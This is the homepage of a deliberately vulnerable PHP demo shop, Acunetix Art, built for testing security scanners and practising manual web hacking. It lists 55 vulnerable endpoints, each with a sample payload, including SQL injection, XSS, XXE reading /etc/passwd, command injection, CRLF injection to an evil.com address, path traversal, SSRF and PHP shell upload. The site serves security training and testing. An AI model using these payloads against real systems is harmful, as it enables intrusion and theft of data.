Acunetix Art

TEST and Demonstration site for Acunetix Web Vulnerability Scanner
WARNING: This is not a real shop. This is an example PHP application which is intentionally vulnerable to web attacks. It is intended to help you test security scanners and practice manual hacking skills.
Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.

Welcome to Acunetix Art

Test site for Acunetix WVS. Browse our collection of fine art from world-renowned artists.

Search art

Quick Links

Featured Products

Forest Cathedral

Moss-covered ancient trees in Pacific Northwest rainforest. Misty atmosphere with shafts of sunlight.

$569.99
View Details

Osaka Graffiti

Street art documentation from Osaka's creative districts. Bold colors meeting traditional Japanese aesthetics.

$319.99
View Details

Fractal Universe

Digital abstract exploring fractal geometry and cosmic patterns. Deep space colors with intricate detail.

$399.99
View Details

Neon Streets

Night photography of Tokyo Shibuya crossing. Long exposure capturing light trails and neon signs.

$479.99
View Details

Vulnerability Demo Pages

#VulnerabilityOWASP CategoryLinkTest Payload
1SQL Injection (Error-based)A03:Injectionartists.php?artist=11 OR 1=1
2SQL Injection (Error-based)A03:Injectionlistproducts.php?cat=11 UNION SELECT 1,2,3,4,5,6
3SQL Injection (Error-based)A03:Injectionproduct.php?pic=11 AND 1=2 UNION SELECT...
4Blind SQL InjectionA03:Injectionsearch.php' OR '1'='1
5SQLi Auth BypassA03:Injectionlogin.php' OR '1'='1 as user
6Second-Order SQLiA03:Injectionnewuser.phpSelect stored payload later
7SQL Injection (AJAX)A03:InjectionAJAX/infocateg.php?id=11 UNION SELECT...
8SQL Injection (ModRewrite)A03:Injectionshop/details.php?id=11 OR 1=1
9SQLi via APIA03:Injectionapi.php?endpoint=users1 UNION SELECT...
10SQLi via IP SpoofingA03:Injectionip.php?query=Set X-Forwarded-For: 127.0.0.1
11Reflected XSSA03:Injectionlistproducts.php?cat=<script>alert(1)</script>
12Reflected XSSA03:Injectionsearch.php<script>alert(document.cookie)</script>
13Reflected XSS (HPP)A03:Injectionhpp/params.php?p=<script>alert(1)</script>
14Reflected XSS (XFF)A03:Injectiondomxss.php?name=<img src=x onerror=alert(1)>
15Stored XSSA03:Injectionguestbook.php<script>alert(1)</script> as name
16DOM-based XSSA03:Injectiondomxss.phpClient-side innerHTML
17XSS via Open RedirectA03:Injectionredirect.phpjavascript:alert(1)
18XML External Entity (XXE)A03:Injectionxml.php<!ENTITY xxe SYSTEM "file:///etc/passwd">
19PHP Eval Injection (SSTI)A03:Injectioneval.php?code=system('id')
20Command InjectionA03:Injectionserver.php?cmd=id, cat /etc/passwd
21LDAP Injection (Sim)A03:Injectionldap.php?username=* wildcard
22Email/CRLF InjectionA03:Injectioncontact.php%0d%0aCc: attacker@evil.com
23Log Injection → RCEA03:Injectionlogpoison.phpInject PHP in User-Agent
24PHP DeserializationA08:Softwareunserialize.phpBase64 serialized PHP object
25Type Juggling (Magic Hash)A08:Softwarehash.php?pass=240610708 (0e...)
26Type Juggling (Loose Comp)A08:Softwarehash.php?a=true&b=1true == 1
27Mass AssignmentA01:BrokenACassigned.phpInject extra POST fields
28IDORA01:BrokenACuserinfo.phpQuery other users' data
29Credit Card DisclosureA04:DesignLogin as test/testCC visible in profile
30Insecure Password ResetA07:Identityforgot.phpToken disclosure
31Session FixationA07:Identitysession.phpSet session ID via URL
32Weak CredentialsA07:Identitylogin.phptest/test
33Auth Bypass (Verb Tampering)A01:BrokenACverb.phpUse POST instead of GET
34Open RedirectA01:BrokenACredirect.phphttp://evil.com
35LFI / Path TraversalA01:BrokenACshowimage.php../../../etc/passwd
36PHP Filter WrapperA01:BrokenACshowimage.php (filter)php://filter/...
37SSRFA10:SSRFshowimage.php (SSRF)http://127.0.0.1:22
38Null Byte InjectionA03:Injectionnullbyte.phpconfig.php%00.jpg
39Arbitrary File UploadA01:BrokenACupload.phpUpload PHP shell → RCE
40Path Traversal (Download)A01:BrokenACdownload.php?file=../config.php
41SSI / Template InjectionA03:Injectionssi.phpCreate file + include
42Host Header InjectionA05:Securityserver.phpModify Host header
43IP Spoofing (XFF Trust)A01:BrokenACip.phpX-Forwarded-For: 127.0.0.1
44HTTP Parameter PollutionA03:Injectionhpp/index.phpDuplicate params
45Insecure CORSA05:Securityapi.phpAccess-Control-Allow-Origin: *
46Info Disclosure (phpinfo)A05:Securityphpinfo.phpPHP config leak
47Info Disclosure (crossdomain)A05:Securitycrossdomain.xmlPermissive Flash policy
48Info Disclosure (VCS leak)A05:SecurityCVS/RootCVS metadata
49Info Disclosure (code leak)A05:Securityindex.zipSource backup
50Directory ListingA05:Security/admin/Options +Indexes
51CSRF (No Tokens)A01:BrokenACguestbook.phpAll forms CSRF-free
52ClickjackingA05:SecurityEntire siteNo X-Frame-Options
53No HttpOnly/Secure FlagA05:Securitysession.phpCookie flags missing
54Log DisclosureA05:Securitylogpoison.phpLogs readable via LFI
55No Rate LimitingA04:DesignEntire siteBrute force enabled

Links